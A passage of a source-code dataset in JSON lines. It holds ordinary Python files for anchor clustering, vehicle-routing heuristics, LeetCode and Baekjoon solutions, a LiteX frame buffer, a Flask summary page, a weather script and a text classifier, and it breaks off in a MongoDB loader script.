numpy array of shape (r, 2), where r is the number of rows\n :param k: number of clusters\n :param dist: distance function\n :return: numpy array of shape (k, 2)\n \"\"\"\n rows = boxes.shape[0]\n\n distances = np.empty((rows, k))\n last_clusters = np.zeros((rows,))\n\n np.random.seed()\n\n # the Forgy method will fail if the whole array contains the same rows\n clusters = boxes[np.random.choice(rows, k, replace=False)]\n\n iter_num = 1\n while True:\n #print(\"Iteration: %d\" % iter_num)\n sys.stdout.write(\"\\rIteration: %d: \" % iter_num)\n iter_num += 1\n\n distances = 1 - iou(boxes, clusters)\n nearest_clusters = np.argmin(distances, axis=1)\n\n if (last_clusters == nearest_clusters).all():\n break\n\n for cluster in range(k):\n if len(boxes[nearest_clusters == cluster]) == 0:\n print(\"Cluster %d is zero size\" % cluster)\n # to avoid empty cluster\n clusters[cluster] = boxes[np.random.choice(rows, 1, replace=False)]\n continue\n\n clusters[cluster] = dist(boxes[nearest_clusters == cluster], axis=0)\n\n last_clusters = nearest_clusters\n\n return clusters\n\ndef show_cluster(data, cluster, max_points=100):\n\t'''\n\tDisplay bouding box's size distribution and anchor generated in scatter.\n\t'''\n\tif len(data) > max_points:\n\t\tidx = np.random.choice(len(data), max_points)\n\t\tdata = data[idx]\n\tplt.scatter(data[:,0], data[:,1], s=5, c='lavender')\n\tplt.scatter(cluster[:,0], cluster[:, 1], c='red', s=100, marker=\"^\")\n\tplt.xlabel(\"Width\")\n\tplt.ylabel(\"Height\")\n\tplt.title(\"Bounding and anchor distribution\")\n\tplt.savefig(\"cluster.png\")\n\tplt.show()\n\ndef 
show_width_height(data, cluster, bins=100):\n\t'''\n\tDisplay the bounding box distribution with histograms.\n\t'''\n\tif data.dtype != np.float32:\n\t\tdata = data.astype(np.float32)\n\twidth = data[:, 0]\n\theight = data[:, 1]\n\tratio = height / width\n\n\tplt.figure(1,figsize=(20, 6))\n\tplt.subplot(131)\n\tplt.hist(width, bins=bins, color='green')\n\tplt.xlabel('Width')\n\tplt.ylabel('Number')\n\tplt.title('Distribution of Width')\n\n\tplt.subplot(132)\n\tplt.hist(height,bins=bins, color='blue')\n\tplt.xlabel('Height')\n\tplt.ylabel('Number')\n\tplt.title('Distribution of Height')\n\n\tplt.subplot(133)\n\tplt.hist(ratio, bins=bins, color='magenta')\n\tplt.xlabel('Height / Width')\n\tplt.ylabel('Number')\n\tplt.title('Distribution of aspect ratio (Height / Width)')\n\tplt.savefig(\"shape-distribution.png\")\n\tplt.show()\n\t\ndef sort_cluster(cluster):\n\t'''\n\tSort the clusters by area, from small to big.\n\t'''\n\tif cluster.dtype != np.float32:\n\t\tcluster = cluster.astype(np.float32)\n\tarea = cluster[:, 0] * cluster[:, 1]\n\tcluster = cluster[area.argsort()]\n\tratio = cluster[:,1:2] / cluster[:, 0:1]\n\treturn np.concatenate([cluster, ratio], axis=-1)\n\ndef get_anchors(data,clusters=9):\n    data = np.array(data)\n    out = kmeans(data, k=clusters)\n    out_sorted = sort_cluster(out)\n    print(\"Accuracy: {:.2f}%\".format(avg_iou(data, out) * 100))\n\n    #show_cluster(data, out, max_points=100)\n\n    if out.dtype != np.float32:\n        out = out.astype(np.float32)\n\n    print(\"Recommended aspect ratios (height/width)\")\n    print(\"Width    Height   Height/Width\")\n    for i in range(len(out_sorted)):\n        print(\"%.3f      %.3f     %.1f\" % (out_sorted[i,0], out_sorted[i,1], out_sorted[i,2]))\n    show_width_height(data, out, bins=100)
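\n\n# Hedged usage sketch (editor addition; the box list is purely illustrative):\n#   boxes = [[12, 30], [45, 90], [24, 60], [60, 120]]\n#   get_anchors(boxes, clusters=2)\n# prints the average IoU and the recommended (width, height, height/width) rows.","repo_name":"imistyrain/ssd-models","sub_path":"python/get_anchors.py","file_name":"get_anchors.py","file_ext":"py","file_size_in_byte":5681,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"21"} +{"seq_id":"34784836931","text":"#cython: language_level=3\nimport numpy as np\nimport random as r\nimport math\nimport heapq\nfrom proc_func2 import GenFunc\n\nclass GENIUS(GenFunc):\n    def __init__(self, points, forbidden=[]):\n        super().__init__(points)\n        self.points = points\n        self.offroute = list(range(0, len(points.time_cost)))\n        for i in forbidden:\n            self.offroute.remove(i)\n        # self.history = []\n        self.onroute = []\n        self.p_neighborhood = {}\n        self.edges = [None] * len(points.time_cost)\n        self.route_cost = 0\n        self.initialize()\n\n    def swap(self, vertex):\n        if vertex in self.offroute:\n            self.onroute.append(vertex)\n            self.offroute.remove(vertex)\n        elif vertex in self.onroute:\n            self.onroute.remove(vertex)\n            self.offroute.append(vertex)\n\n    def initialize(self):\n        self.swap(0)\n        v1 = r.choice(self.offroute)\n        self.swap(v1)\n        v2 = r.choice(self.offroute)\n        self.swap(v2)\n        self.edges[0] = v1\n        self.edges[v1] = v2\n        self.edges[v2] = 0\n        self.route_cost = self.time_cost(self.edges)\n        # self.history.append([self.edges])\n        self.get_neighborhoods(5)\n\n    def cycle(self):\n        n = 3\n        while self.offroute != []:\n            chosen_vertex = r.choice(self.offroute)\n            self.insert_vertex(chosen_vertex, self.edges)\n            self.get_neighborhoods(5)\n            n += 1\n            print(f'+ {n}')\n\n    def insert_vertex(self, vertex, edgeset, direction=False):\n        possible_moves = {}\n        move_key = 0\n        vi = self.p_neighborhood[vertex]\n        vj = self.p_neighborhood[vertex]\n        if direction:\n            direct = [edgeset]\n        else:\n            direct = [edgeset, self.reverse(edgeset, 0, 0)]\n        for d_set in direct:\n            for i in vi:\n                if i == vertex:\n                    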
continue\n vi1 = self.find_successor(i, d_set)\n for j in vj:\n if j == vertex:\n continue\n if i == j:\n continue\n j_to_i = self.points_between(d_set, j, i)\n # except TypeError:\n # print(f'j: {j}')\n # print(f'i: {i}')\n # print(f'v: {vertex}')\n # print(f'vi: {vi}')\n # print(f'offroute: {self.offroute}')\n # print(f'onroute: {self.onroute}')\n # print('neighborhoods:')\n # print(self.p_neighborhood)\n # input('halt')\n i_to_j = self.points_between(d_set, i, j)\n vj1 = self.find_successor(j, d_set)\n vk = self.p_neighborhood[vi1]\n vl = self.p_neighborhood[vj1]\n for k in vk:\n if k == vertex:\n continue\n if j == k:\n continue\n if k not in j_to_i:\n continue\n possible_moves[move_key] = self.t1_string(d_set, i, j, k, vertex)\n move_key += 1\n for l in vl:\n if l == vertex:\n continue\n if i == l:\n continue\n if l not in i_to_j:\n continue\n if k != vj1 and l != vi1:\n possible_moves[move_key] = self.t2_string(d_set, i, j, k, l, vertex)\n move_key += 1\n min_pair = self.best_candidate(possible_moves)\n if direction:\n return possible_moves[min_pair[0]]\n else:\n self.swap(vertex)\n self.execute_move(possible_moves[min_pair[0]])\n possible_moves = {}\n return None\n\n def p_neighbors(self, vertex, p):\n distances = self.duration[vertex].copy()\n valid = []\n for i in range(0, len(distances)):\n if i != vertex and i in self.onroute:\n valid.append(distances[i])\n else:\n valid.append(math.inf)\n nearest = heapq.nsmallest(p, valid)\n neighbors = []\n for i in nearest:\n if i != math.inf:\n q = valid.index(i)\n neighbors.append(q)\n valid[q] = math.inf\n # for val in neighbors:\n # if val in self.offroute:\n # print(f'key: {vertex}, value: {neighbors}')\n # print(f'off: {self.offroute}')\n # print(f'on: {self.onroute}')\n # print(f'alleged valid: {valid}')\n # print(f'near: {nearest}')\n # for i in nearest:\n # if i != math.inf:\n # print(np.where(distances==i)[0][0])\n # input('halt')\n return neighbors\n\n def get_neighborhoods(self, p):\n for vertex in self.offroute:\n neighborhood = self.p_neighbors(vertex, p)\n self.p_neighborhood[vertex] = neighborhood\n for vertex in self.onroute:\n neighborhood = self.p_neighbors(vertex, p)\n self.p_neighborhood[vertex] = neighborhood\n # for k, v in self.p_neighborhood.items():\n # for value in v:\n # if value in self.offroute:\n # print(f'key: {k}, value: {v}')\n # print(f'off: {self.offroute}')\n # print(f'on: {self.onroute}')\n # input('halt')\n\n def execute_move(self, move):\n self.edges = move['frame']\n self.route_cost = move['cost']\n # self.history.append([self.edges])\n\n def post_opt(self):\n tau = self.edges.copy()\n zed = self.route_cost\n t = 1\n n = len(self.edges)\n print(f'Starting cost: {zed}')\n while t != n:\n if tau[t] == None:\n t += 1\n continue\n if tau[t] == 0:\n tau, zed = self.reinsert_vertex(0, tau)\n else:\n tau, zed = self.reinsert_vertex(t, tau)\n if zed < self.route_cost:\n self.edges = tau.copy()\n self.route_cost = zed\n print(f'Improvement to: {zed}')\n t = 1\n # self.history.append([self.edges])\n elif zed >= self.route_cost:\n t += 1\n\n def reinsert_vertex(self, vi, edgeset):\n possible_moves = {}\n move_key = 0\n for d_set in [edgeset, self.reverse(edgeset, 0, 0)]:\n vi1 = self.find_successor(vi, d_set)\n vip = self.find_predecessor(vi, d_set)\n vj = self.p_neighborhood[vi1]\n for j in vj:\n if j == vi:\n continue\n if j == vip:\n continue\n vj1 = self.find_successor(j, d_set)\n i1_to_j = self.points_between(d_set, vi1, j)\n j1_to_i = self.points_between(d_set, vj1, vi)\n vk = self.p_neighborhood[vip]\n 
for k in vk:\n                    if k == vi:\n                        continue\n                    if vip == k:\n                        continue\n                    if k in i1_to_j:\n                        move = self.t1_unstring(d_set, j, k, vi)\n                        if move:\n                            possible_moves[move_key] = self.insert_vertex(vi, move, direction=True)\n                            move_key += 1\n                    if k in j1_to_i:\n                        vk1 = self.find_successor(k, d_set)\n                        vl = self.p_neighborhood[vk1]\n                        j_to_k = self.points_between(d_set, j, k)\n                        for l in vl:\n                            if vi == l:\n                                continue\n                            if l not in j_to_k:\n                                continue\n                            if k != vj1 and l != vi1:\n                                move = self.t2_unstring(d_set, j, k, l, vi)\n                                if move:\n                                    possible_moves[move_key] = self.insert_vertex(vi, move, direction=True)\n                                    move_key += 1\n        min_pair = ['x', math.inf]\n        for key in possible_moves.keys():\n            if possible_moves[key] is not None:\n                if possible_moves[key]['cost'] <= min_pair[1]:\n                    min_pair = [key, possible_moves[key]['cost']]\n        return possible_moves[min_pair[0]]['frame'], min_pair[1]","repo_name":"ah508/VRP","sub_path":"genius.py","file_name":"genius.py","file_ext":"py","file_size_in_byte":8970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70426121332","text":"from itertools import accumulate\n\n\nclass Solution:\n    def shiftingLetters(self, s: str, shifts: list[int]) -> str:\n        def shift(char, i):\n            return chr((ord(char) - ord('a') + i) % (ord('z') - ord('a') + 1) + ord('a'))\n\n        result = ''\n        shifts = list(map(lambda x: x % (ord('z') - ord('a') + 1), list(accumulate(shifts[::-1]))[::-1]))\n
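        # The reversed running sums above turn per-index shifts into suffix sums:\n        # e.g. shifts = [3, 5, 9] becomes [17, 14, 9], since shifts[i] also applies\n        # to every earlier character; each total is then reduced mod 26.\n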
        for ch, n in zip(s, shifts):\n            result += shift(ch, n)\n\n        return result\n\n\ncases = [\n    [\"abc\", [3, 5, 9]],\n    [\"aaa\", [1, 2, 3]],\n    [\"bad\", [10, 20, 30]],  # jyh\n    [\"abcd\", [3, 5, 9, 0]],\n]\n\nfor c in cases:\n    print(Solution().shiftingLetters(*c))\n","repo_name":"Jeldo/PS","sub_path":"leetcode/solved/848.py","file_name":"848.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34583006148","text":"from migen import *\nfrom litex.soc.interconnect.csr import *\n\nimport math\n\n# Main module\nclass frame_buffer_SW(Module,AutoCSR):\n    def __init__(self, DEBUG_READ_MODE=0):\n        \n        ## Parameters\n        depth = 76800\n        width = 15\n\n        self.zero_signal = Signal()\n\n        ## Inputs\n        self.BUFFER_CLK = Signal()\n        self.BUFFER_RESET = Signal()\n\n        self.BUFFER_WRITE_CLK = Signal()    # write addressing signals\n        self.BUFFER_INPUT_PX_DATA = Signal(width)    # write data signals\n        self.BUFFER_WRITE_ADDR = Signal(math.ceil(math.log(depth,2)))    # write addressing signals\n        self.BUFFER_ENABLE_MEM = Signal()\n        self.BUFFER_RQ_WRITE = Signal()    # write control signals\n        self.BUFFER_WRITING = Signal()    # write control signals\n        \n        ## Outputs\n        self.BUFFER_OUTPUT_PX_DATA = Signal(width)    # read data signals\n        self.BUFFER_ACK_READ = Signal()    # read control signals\n        self.BUFFER_ACK_WRITE = Signal()    # write control signals\n\n        ## Internal Registers\n        self.read_clk_reg = CSRStorage()\n        self.output_px_data_reg = CSRStatus(15)\n        self.read_addr_reg = CSRStorage(math.ceil(math.log(depth,2)))\n        self.rq_read_reg = CSRStorage()\n        self.reading_reg = CSRStorage()\n        self.ack_read_reg = CSRStatus()\n\n        ## Instances\n        self.specials += Instance(\"frame_buffer\",\n                            p_depth = depth,\n                            p_DEBUG_READ_MODE = DEBUG_READ_MODE,\n                            i_buffer_clk = self.BUFFER_CLK,\n                            i_reset = self.BUFFER_RESET,\n                            i_write_clk = self.BUFFER_WRITE_CLK,\n                            i_input_px_data = self.BUFFER_INPUT_PX_DATA,\n                            i_write_addr = self.BUFFER_WRITE_ADDR,\n                            i_enable_mem = self.BUFFER_ENABLE_MEM,\n                            i_rq_write = self.BUFFER_RQ_WRITE,\n                            i_writing = self.BUFFER_WRITING,\n                            o_ack_write = self.BUFFER_ACK_WRITE,\n                            i_read_clk = self.read_clk_reg.storage,\n                            i_read_addr = self.read_addr_reg.storage,\n                            o_output_px_data = self.BUFFER_OUTPUT_PX_DATA,\n                            i_rq_read = self.rq_read_reg.storage,\n                            i_reading = self.reading_reg.storage,\n                            o_ack_read = self.BUFFER_ACK_READ,\n                            )\n        self.comb += [\n            self.zero_signal.eq(0),\n            self.output_px_data_reg.status.eq(Cat(self.BUFFER_OUTPUT_PX_DATA[0:5],self.zero_signal,self.BUFFER_OUTPUT_PX_DATA[5:16])),\n            self.ack_read_reg.status.eq(self.BUFFER_ACK_READ),\n        ]\n","repo_name":"DianaNatali/soc_image_preprocessing","sub_path":"hardware/frame_buffer/frame_buffer_SW.py","file_name":"frame_buffer_SW.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27826985071","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('AGG')\nimport matplotlib.pyplot as plt\nimport cv2\nimport os\nfrom config import cfg\nimport net.processing.boxes3d as box3d\n\n\nif not os.path.exists(cfg.LOG_DIR): os.makedirs(cfg.LOG_DIR)\n\ndef imshow(name, image, resize=1):\n    H,W,_ = image.shape\n    cv2.namedWindow(name, cv2.WINDOW_NORMAL)\n    cv2.imshow(name, image.astype(np.uint8))\n    cv2.resizeWindow(name, round(resize*W), round(resize*H))\n\n\ndef normalise(image, limit=255.0):\n    image -= image.min()\n    image *= (limit/image.max())\n    return image\n\ndef imsave(name, image, subdir=''):\n    dir=os.path.join(cfg.LOG_DIR,subdir)\n    os.makedirs(dir,exist_ok=True)\n    plt.imsave(os.path.join(dir,name)+'.png' ,image)\n\ndef npsave(name,numpy_array):\n    np.save(os.path.join(cfg.LOG_DIR,name),numpy_array)\n\ndef draw_box3d_on_camera(rgb, boxes3d, color=(255, 0, 255), thickness=1, text_lables=[]):\n    projections = box3d.box3d_to_rgb_box(boxes3d)\n    rgb = box3d.draw_rgb_projections(rgb, projections, color=color, thickness=thickness)\n    font = cv2.FONT_HERSHEY_SIMPLEX\n    for i,text in enumerate(text_lables):\n        text_pos = (np.min(projections[i,:, 0]), max(np.min(projections[i,:, 1]), 15) )\n        cv2.putText(rgb, text, text_pos, font, 0.7, (0, 255, 100), 1, cv2.LINE_AA)\n\n    return rgb\n","repo_name":"bostondiditeam/MV3D","sub_path":"src/net/utility/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":456,"dataset":"github-code","pt":"21"} +{"seq_id":"71007233014","text":"#!/usr/bin/python\n\"\"\"\nUnlike problem 1208 (Subsequence Sum 2), every weight in this problem is positive.\nSo whenever a sum built from the items is at most the target value c,\nfindSubSum appends it to tmp_arr.\n\nBinary search / two pointers is also faster here than the Counter used in 1208:\n1208 picks sums that hit an exact value, while this problem picks a range,\nand a Counter would loop over unnecessary parts of that range.\n\"\"\"\nimport sys\n\ninput = sys.stdin.readline\n\ndef findSubSum(sub_sum, sub_arr, c):\n    for basis in sub_arr:\n        tmp_arr = []\n        for element in sub_sum:\n            tmp_sum = element + basis\n            if tmp_sum <= c:\n                tmp_arr.append(tmp_sum)\n        sub_sum += tmp_arr\n
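\n\n# Worked micro-example (editor addition): findSubSum([0], [1, 2], c=3) grows\n# the first list to [0, 1, 2, 3] - every subset sum of {1, 2} that is <= c.\n\nn, c = map(int, input().split())\nstuff = list(map(int, input().split()))\n\nborder = n // 2\nstuff_a = stuff[:border]\nstuff_b = stuff[border:]\n\nsum_a, sum_b = [0], [0]\n\nfindSubSum(sum_a, stuff_a, c)\nfindSubSum(sum_b, stuff_b, c)\n\nsum_a.sort()\nsum_b.sort()\n\nleft, right = 0, len(sum_b) - 1\ncount = 0\n\nwhile left < len(sum_a) and right >= 0:\n    if sum_a[left] + sum_b[right] <= c:\n        count += right + 1\n        left += 1\n    else:\n        right -= 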
1\n\nprint(count)","repo_name":"c0natus/Practice","sub_path":"Algorithm-practice/BaekJoon/Gold or higher/B1450.py","file_name":"B1450.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15855269191","text":"#!/usr/bin/env python3\n\nfrom flask import render_template\nimport sqlite3\n\n# import global config\nfrom ..config import conf\n\n# set blueprint object\nfrom flask import Blueprint\nblueprint = Blueprint('summary', __name__)\n\n\n@blueprint.route(\"/summary\")\ndef page_summary():\n\n # fetch data\n datasets = fetch_datasets_summary(conf[\"db_path\"])\n runs = fetch_runs_summary(conf[\"db_path\"])\n\n # page title\n page_title = \"Summary\"\n page_subtitle = (\n \"Here you will find the summary of all datasets and runs included \"\n \"in this output package. Click 'view' to see \"\n \"the detailed information of each run/dataset.\"\n )\n\n # render view\n return render_template(\n \"summary/main.html.j2\",\n page_title=page_title,\n page_subtitle=page_subtitle,\n datasets=datasets,\n runs=runs\n )\n\n\ndef fetch_datasets_summary(db_path):\n \"\"\" fetch datasets summary \"\"\"\n with sqlite3.connect(db_path) as con:\n datasets = []\n cur = con.cursor()\n for ds_id, ds_name, ds_desc in cur.execute(\n (\"select id,name,description\"\n \" from dataset\"\n \" order by name asc\")\n ).fetchall():\n # fetch genome counts\n genomes_count = cur.execute(\n (\"select count(distinct orig_folder)\"\n \" from bgc\"\n \" where dataset_id=?\"\n \" and orig_folder <> ''\"),\n (ds_id, )\n ).fetchall()[0][0]\n # fetch bgc counts\n bgc_count = cur.execute(\n (\"select count(id)\"\n \" from bgc\"\n \" where dataset_id=?\"),\n (ds_id, )\n ).fetchall()[0][0]\n # fetch bgc with taxonomy counts\n bgc_count_taxonomy = cur.execute(\n (\"select count(distinct bgc_id)\"\n \" from bgc,bgc_taxonomy\"\n \" where bgc.id=bgc_taxonomy.bgc_id\"\n \" and bgc.dataset_id=?\"),\n (ds_id, )\n ).fetchall()[0][0]\n datasets.append({\n \"id\": ds_id,\n \"count_genomes\": genomes_count,\n \"count_bgcs\": bgc_count,\n \"count_bgcs_with_taxonomy\": bgc_count_taxonomy,\n \"name\": ds_name,\n \"desc\": ds_desc\n })\n return datasets\n\n\ndef fetch_runs_summary(db_path):\n \"\"\" fetch runs summary \"\"\"\n with sqlite3.connect(db_path) as con:\n runs = []\n cur = con.cursor()\n run_status_enum = {\n row[0]: row[1] for row in cur.execute(\n (\"select id, name\"\n \" from enum_run_status\"\n \" order by id asc\")\n )\n }\n for run_id, run_status in cur.execute(\n (\"select run.id,run.status\"\n \" from run\"\n \" order by id asc\")\n ).fetchall():\n # fetch bgc counts\n bgc_count = cur.execute(\n (\"select count(bgc_id)\"\n \" from run_bgc_status\"\n \" where run_id=?\"),\n (run_id, )\n ).fetchall()[0][0]\n # fetch gcf counts\n if run_status >= 5: # CLUSTERING_FINISHED\n gcf_count = cur.execute(\n (\"select count(gcf.id)\"\n \" from gcf,clustering\"\n \" where gcf.clustering_id=clustering.id\"\n \" and clustering.run_id=?\"),\n (run_id, )\n ).fetchall()[0][0]\n # fetch threshold\n threshold = cur.execute((\n \"select threshold\"\n \" from clustering\"\n \" where run_id=?\"\n ), (run_id, )).fetchall()[0][0]\n else:\n gcf_count = \"n/a\"\n threshold = -1\n # fetch start time\n try:\n run_start = cur.execute(\n (\"select strftime('%Y-%m-%d %H:%M:%S', time_stamp)\"\n \" from run_log\"\n \" where run_id=? 
and message like 'run created %'\"),\n                    (run_id, )\n                ).fetchall()[0][0]\n            except IndexError:\n                run_start = \"n/a\"\n            # fetch end time\n            try:\n                run_finished = cur.execute(\n                    (\"select strftime('%Y-%m-%d %H:%M:%S', time_stamp)\"\n                     \" from run_log\"\n                     \" where run_id=? and message like 'run finished'\"),\n                    (run_id, )\n                ).fetchall()[0][0]\n            except IndexError:\n                run_finished = \"n/a\"\n            # fetch resumes\n            run_resumes = [row[0] for row in cur.execute(\n                (\"select strftime('%Y-%m-%d %H:%M:%S', time_stamp)\"\n                 \" from run_log\"\n                 \" where run_id=? and message like 'run resumed %'\"),\n                (run_id, )\n            ).fetchall()]\n            # add to result\n            run_name = \"run-{:04d}\".format(run_id)\n            runs.append({\n                \"id\": run_id,\n                \"name\": run_name,\n                \"start\": run_start,\n                \"finished\": run_finished,\n                \"resumes\": run_resumes,\n                \"status\": run_status_enum[run_status],\n                \"count_bgcs\": bgc_count,\n                \"count_gcfs\": gcf_count,\n                \"threshold\": float(\"{:.2f}\".format(threshold))\n            })\n        return runs\n","repo_name":"medema-group/bigslice","sub_path":"bigslice/modules/output/flask_app/app/controllers/summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":5607,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"21"} +{"seq_id":"4929592093","text":"from collections import Counter\n\n\n# unnecessary...i forgot \ndef common_factors(l1, l2):\n    # multiplicity of each factor shared by both lists\n    common_elements = set(l1).intersection(set(l2))\n    c1 = Counter(l1)\n    c2 = Counter(l2)\n    \n    d = {}\n    for key in common_elements:\n        d[key] = min(c1[key], c2[key])\n    return d\n
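\n# Hedged usage example (editor addition):\n#   common_factors([2, 2, 3], [2, 2, 2, 5]) -> {2: 2}\n# the shared factor 2 appears twice in the first list and three times in the\n# second, so its common multiplicity is min(2, 3) = 2.\n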
","repo_name":"chirs/puzzles","sub_path":"tools/factors.py","file_name":"factors.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22146498796","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n    long_description = fh.read()\n\nsetuptools.setup(\n    name='plottingFunctions',\n    version='0.0.1',\n    author='Douglas F Porter',\n    author_email='dfporter@gmail.com',\n    description='Various plotting functions.',\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    url='https://github.com/dfporter/plottingFunctions',\n    project_urls = {\n        \"Bug Tracker\": \"https://github.com/dfporter/plottingFunctions/issues\"\n    },\n    license='MIT',\n    packages=['plottingFunctions'],\n    install_requires=['numpy', 'fastcluster', 'scikit-learn', 'scipy', 'pandas', 'adjustText'],\n)\n","repo_name":"dfporter/plottingFunctions","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36967166597","text":"from django.contrib import admin\n\nfrom shopify_install.models import Token\n\nclass TokenAdmin(admin.ModelAdmin):\n    list_display = ['token', 'shop']\n    list_filter = ['shop']\n    search_fields = ['token', 'shop']\n\nadmin.site.register(Token, TokenAdmin)\n","repo_name":"igorsobreira/shopify_install","sub_path":"shopify_install/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72416592053","text":"from datetime import datetime\nfrom meteostat import Normals,Point\nimport matplotlib.pyplot as plt\nfrom meteostat import Stations, Monthly\nfrom geopy.geocoders import Nominatim\nimport csv\n\nstations = Stations()\nstations = stations.nearby(42.3601,71.0589)\nstation = stations.fetch(1)\n\n\n#data = Normals(station, None, None)\n#list_of_places =[\"La Caleta, Dominican Republic\",\n#                 \"Santiago, Chile\",\n#                 \"South Andros, Sanctuary Blue Hole,\tBahamas\",\n#                 \"Alaska, western interior, Tochak McGrath, Upper Kuskokwim River,\tUSA\",\n#                 \"Abaco, Hopetown,\tBahamas\",\n#                 \"Uelen Chukotka, Russia\",\n#                 \"La Caleta,\tDominican Republic\"]\n\n\n#gn = geocoders.GeoNames(username= \"maximkax\")\n\nlocation_csv = \"../data/geo_locations/locations_test.csv\"\n\nlist_of_places = []\nwith open(location_csv, 'r') as file:\n    csvreader = csv.reader(file)\n    for row in csvreader:\n        list_of_places.append(\"\".join(row))\n\n\nfor item in list_of_places:\n    locator = Nominatim(user_agent=\"maximkax\")\n    location = locator.geocode(item)\n    try:\n        print(\"****\")\n        print(item, \" Latitude = {}, Longitude = {}\".format(location.latitude, location.longitude))\n        stations = stations.nearby(location.latitude, location.longitude)\n        station = stations.fetch(1)\n\n        start = datetime(2010, 1, 1)\n        end = datetime(2015, 12, 31)\n        data = Monthly(station, start, end)\n        data = data.fetch()\n        print(\"average temperature : \", data[['tavg']].mean())\n        print(\"average precipitation : \", data[['prcp']].mean())\n        data.plot(y=['tavg', 'prcp'])\n        plt.show()\n        print(\"****\")\n    except Exception:\n        print(\"WARNING : Location was not found\", item)\n\n","repo_name":"maksimkazanskii/DEEP_PATCH","sub_path":"src/meteo_test.py","file_name":"meteo_test.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34037442044","text":"import numpy as np\r\nimport tensorflow as tf\r\nimport re\r\nimport pickle\r\nimport matplotlib.pyplot as plt\r\ntf.config.set_visible_devices([],'GPU')\r\n\r\n\r\nclass paraNetClass():\r\n    def __init__(self):\r\n        with open('dictf.pkl', 'rb') as f:\r\n            self.dict_of_words = pickle.load(f)\r\n        self.dictThemes = {0:'Cats (animals);',\r\n                           1:'The UNIX cat utility for printing file contents;',\r\n                           2:'OS X versions named after the cat family.',}\r\n        self.a = np.zeros([1,200])\r\n        self.paraNET = tf.keras.models.load_model('ParaNet')\r\n        self.nn_words = list()\r\n    def text_analyse(self,text):\r\n        text = re.split(\"[^a-z]\", text.lower())\r\n\r\n        for word in text:\r\n            if (word in self.dict_of_words):\r\n                self.nn_words.append(self.dict_of_words[word])\r\n\r\n        # reset the feature window so indices from a previous, longer text\r\n        # do not leak into this prediction\r\n        self.a = np.zeros([1,200])\r\n        for j, var in enumerate(self.nn_words):\r\n            self.a[0,j] = self.nn_words[j]\r\n\r\n        self.nn_words.clear()\r\n        b = self.a.reshape(1,1,200)\r\n\r\n        themes = self.paraNET.predict(b)\r\n\r\n        arg = np.argmax(themes)\r\n\r\n        theme = self.dictThemes[arg]\r\n\r\n        # return the full probability row: the caller indexes all three classes\r\n        return themes[0]\r\n\r\n\r\nparaNET = paraNetClass()\r\n\r\n\r\nwith open('sentences.txt', 'r') as fp:\r\n    input_text = fp.readlines()\r\n\r\n\r\nprobabilities1 = list()\r\nprobabilities2 = list()\r\nprobabilities3 = list()\r\n\r\nn = np.linspace(1,20,20)\r\n\r\nfor line in input_text:\r\n    result = paraNET.text_analyse(line)\r\n    probabilities1.append(result[0])\r\n    probabilities2.append(result[1])\r\n    probabilities3.append(result[2])\r\n\r\n
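# Editor note (hedged): each bar series below plots, per input sentence, the\r\n# model's score for one of the three themes returned by text_analyse; whether\r\n# these are softmax probabilities depends on the saved ParaNet model's head.\r\nplt.bar(n,probabilities1, label ='Cats')\r\nplt.bar(n,probabilities2 ,label ='UNIX Cat')\r\nplt.bar(n,probabilities3, label ='OS 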
X')\r\nplt.legend(loc=4)\r\nplt.show()\r\n\r\n\r\n\r\n","repo_name":"razbiralochka/AI_LABS","sub_path":"AI_Labs/Laba1/ParaNET.py","file_name":"ParaNET.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25487379265","text":"import os\n\nimport pymongo\nimport json\nimport time\n# Establish connection\nclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\ndb = client[\"test\"] # Replace with your DB name\ncollection = db[\"players\"]\n\n'''file = open(\"../esports-data/players.json\", \"r\", encoding=\"utf-8\")\nplayer_data = json.load(file)\nfile = open(\"../esports-data/leagues.json\", \"r\", encoding=\"utf-8\")\nleagues = json.load(file)\nfile = open(\"../esports-data/tournaments.json\", \"r\", encoding=\"utf-8\")\ntournaments = json.load(file)\n\n# Check for empty values and throw errors\nfor record in player_data:\n for key, value in record.items():\n if not value and key != \"home_team_id\": # It's okay for home_team_id to be null, but not other fields\n raise ValueError(f\"Empty value detected for {key} in record {record['player_id']}\")\n\n# Insert data, skipping any duplicates\nfor record in player_data:\n if not collection.find_one({\"player_id\": record[\"player_id\"]}):\n try:\n collection.insert_one(record)\n except pymongo.errors.DuplicateKeyError:\n # This can be reached if there's a unique index constraint\n # (though you mentioned there's no need to create a unique index)\n print(f\"Duplicate player detected: {record['player_id']}\")\n else:\n print(f\"Duplicate player detected: {record['player_id']}\")\n\n# 1. Establish connection\ncollection = db[\"tournaments\"]\n\n# 2. Load the tournaments and leagues data & 3. Check the tournaments against the leagues data\nall_tournament_ids = {tournament['id'] for tournament in tournaments}\n\nleague_tournament_ids = 